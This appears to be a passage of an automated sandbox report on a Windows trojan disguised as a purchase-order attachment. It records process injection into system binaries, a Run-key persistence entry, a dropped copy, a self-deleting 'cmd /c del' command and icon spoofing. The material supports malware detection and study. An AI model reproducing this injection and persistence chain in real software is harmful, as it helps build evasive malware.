          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05022B28
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501DBD2
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050103DA
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0500FA2B
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8EBB0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_050222AE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7AB40
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6D466
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB841F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E725DD
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBD5E0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD2581
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E71D55
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E72D07
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA0D20
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E72EF7
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC6E30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6D616
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E71FF1
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7DFCE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E728EC
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBB090
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E720A8
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7E824
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61002
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCA830
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC99BF
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAF900
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC4120
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E64AEF
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E722AE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E5FA2B
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDABD8
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E523E3
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6DBD2
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E603DA
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDEBB0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCAB40
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E72B28
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCA309
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 04F5B150 appears 54 times
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 04DAB150 appears 107 times
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99560 NtWriteFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F9AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F996D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F9A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F9A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F9B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F9A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F99B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE9B00 NtSetValueKey,
          Source: Nova narudzba u prilogu.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Nova narudzba u prilogu.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ajshkennyc.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Ajshkennyc.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Users\user\Contacts\Ajshkennyc.exeSection loaded: mpclient.dll
          Source: C:\Windows\explorer.exeSection loaded: wpnapps.dll
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: 72480000 page no access
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: 72480000 page read and write
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: 72481000 page read and write
          Source: Nova narudzba u prilogu.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeFile read: C:\Users\user\Desktop\Nova narudzba u prilogu.exeJump to behavior
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Nova narudzba u prilogu.exe "C:\Users\user\Desktop\Nova narudzba u prilogu.exe"
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Ajshkennyc.exe "C:\Users\user\Contacts\Ajshkennyc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Ajshkennyc.exe "C:\Users\user\Contacts\Ajshkennyc.exe"
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Ajshkennyc.exe "C:\Users\user\Contacts\Ajshkennyc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Ajshkennyc.exe "C:\Users\user\Contacts\Ajshkennyc.exe"
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Ajshkennychvrlvyqvxklxbhfqfzgvr[1]Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/6@3/2
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_01
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Ajshkennyc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Ajshkennyc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Ajshkennyc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Ajshkennyc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: colorcpl.pdbGCTL source: DpiScaling.exe, 00000005.00000002.829989653.00000000053A0000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: DpiScaling.exe, 00000005.00000002.829989653.00000000053A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 00000005.00000002.827879975.000000000504F000.00000040.00000001.sdmp, DpiScaling.exe, 00000005.00000002.827366166.0000000004F30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02597A2A push 004064D8h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02594ABE push eax; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259933E push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02597BE0 push 00406690h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02597BE2 push 00406690h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_025979F0 push 004064A0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_025979F2 push 004064A0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02597EF2 push 004069A0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DE88 push 0040C97Bh; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DE8A push 0040C97Bh; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DF70 push 0040CA20h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DF72 push 0040CA20h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02597712 push 004061E5h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DF12 push 0040C9C0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DF02 push 0040C9C0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DFAA push 0040CA58h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259E7AA push 0040D258h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_0259DD0A push 0040C908h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A22E push 0040C908h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D073C2 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A3AC push 0040C97Bh; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A3AE push 0040C97Bh; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D0C02E push 0040CA58h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D14104 push 00406690h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D14106 push 00406690h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D05796 push 004061E5h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A4CE push 0040CA58h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A494 push 0040CA20h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A496 push 0040CA20h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D14416 push 004069A0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeCode function: 0_3_02D1A436 push 0040C9C0h; ret
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeFile created: C:\Users\user\Contacts\Ajshkennyc.exeJump to dropped file
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AjshkennycJump to behavior
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AjshkennycJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon306.png
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
